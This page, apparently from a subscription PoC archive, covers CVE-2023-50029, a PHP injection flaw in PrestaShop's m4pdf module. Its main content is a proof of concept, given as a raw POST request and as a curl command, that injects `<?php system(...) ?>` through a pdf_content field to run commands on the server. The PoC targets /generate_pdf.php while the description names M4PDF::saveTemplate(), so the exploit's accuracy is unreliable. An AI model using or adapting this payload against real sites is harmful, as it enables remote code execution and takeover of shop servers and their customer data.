关联漏洞
标题:PrestaShop 安全漏洞 (CVE-2023-50029)Description:PrestaShop是美国PrestaShop公司的一套开源的电子商务解决方案。该方案提供多种支付方式、短消息提醒和商品图片缩放等功能。 PrestaShop m4pdf 3.3.2之前版本存在安全漏洞。攻击者利用该漏洞通过 M4PDF::saveTemplate() 方法运行任意代码。
Description
CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module
介绍
# PHP-Injection-in-M4-PDF-Extensions
CVE-2023-50029 is a PHP injection vulnerability in the M4 PDF Extensions module. This vulnerability allows attackers to inject and execute arbitrary PHP code on the server, enabling them to gain full control over the targeted system. The issue lies in the improper validation of inputs, allowing malicious code to be passed through user parameters.
### Poc
```
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
```
### OR Curl
```
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"
```
文件快照
[4.0K] /data/pocs/073a2ac00642657b6d02792adb017d47b45670a4
└── [ 678] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →